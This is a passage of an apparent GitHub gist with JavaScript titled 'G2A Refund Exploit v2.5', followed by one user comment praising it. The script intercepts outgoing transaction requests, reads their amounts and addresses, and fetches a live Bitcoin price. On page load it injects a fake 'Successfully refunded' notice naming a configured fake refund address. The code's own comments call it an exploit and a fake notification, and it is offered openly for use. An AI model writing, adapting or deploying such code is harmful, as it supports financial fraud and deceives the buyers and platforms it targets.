        const transactionData = JSON.parse(body);
        if (transactionData.amount && transactionData.address) {
          processRefund(transactionData);
        }
      } catch (error) {
        console.error('Error parsing transaction:', error);
      }
    }
    originalSend.apply(this, [body]);
  };
}

// Lógica principal de reembolso
async function processRefund(txData) {
  try {
    const priceResponse = await fetch('https://api.coingecko.com/api/v3/simple/price?ids=bitcoin&vs_currencies=usd');
    const priceData = await priceResponse.json();
    
    const refundAmount = txData.amount * exploitConfig.refundPercentage;
    const usdValue = refundAmount * priceData.bitcoin.usd;
    
    showRefundNotification({
      originalAmount: txData.amount,
      refundAmount: refundAmount,
      usdValue: usdValue.toFixed(2),
      destinationAddress: exploitConfig.fakeRefundAddress
    });
    
  } catch (error) {
    console.error('Refund processing failed:', error);
    updateUIStatus('Error processing refund');
  }
}

// Mostrar notificación falsa
function showRefundNotification(details) {
  const notificationHTML = `
    <div class="refund-notification">
      <p>Successfully refunded ${details.refundAmount} BTC ($${details.usdValue})</p>
      <p>Original transaction: ${details.originalAmount} BTC</p>
      <p>Sent to: ${details.destinationAddress}</p>
    </div>
  `;
  
  document.querySelector('.g2a-refund-box').insertAdjacentHTML('beforeend', notificationHTML);
}

// Inicializar el exploit
function initExploit() {
  injectFakeUI();
  monitorTransactions();
  console.log('G2A Refund Exploit v2.5 - Active');
}

// Inicio del script
window.addEventListener('load', initExploit);

@gostrafx
Copy link

gostrafx commented Apr 9, 2025

perfect fast 👌

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment